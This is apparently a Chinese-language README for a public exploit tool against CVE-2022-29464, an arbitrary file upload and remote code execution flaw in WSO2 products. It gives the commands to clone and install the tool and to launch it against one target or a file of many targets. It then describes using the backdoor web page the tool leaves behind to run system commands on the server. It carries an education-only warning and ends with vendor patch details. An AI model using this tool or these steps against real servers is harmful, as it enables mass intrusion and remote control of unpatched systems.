
CVE-2022-29464 Exploit
CVE-2022-29464 影响部分 WSO2 产品,如 WSO2 API Manager 和 WSO2 Open Banking,允许任意文件上传和远程代码执行。
受影响产品:
警告:仅用于教育目的。
克隆此仓库:
git clone https://github.com/Pasch0/WSO2RCE.git
cd WSO2RCE
pip install rich
使用 -u 参数指定单个目标 URL,或使用 -f 参数指定包含多个目标的文件来发起攻击:
python run.py -u https://alvo.com/

访问脚本执行生成的后门 URL 后,可以在文本框中输入系统命令,并在页面中获取响应。

WSO2 在 2022 年 1 月向客户提供了临时缓解措施,并于 2022 年 2 月为 WSO2 支持矩阵 中列出的所有支持的版本(状态为“可用”和“过时”)提供了修复程序。如果您是拥有支持订阅的 WSO2 客户,请使用 WSO2 更新 应用修复程序。
更多详情请访问:https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2021-1738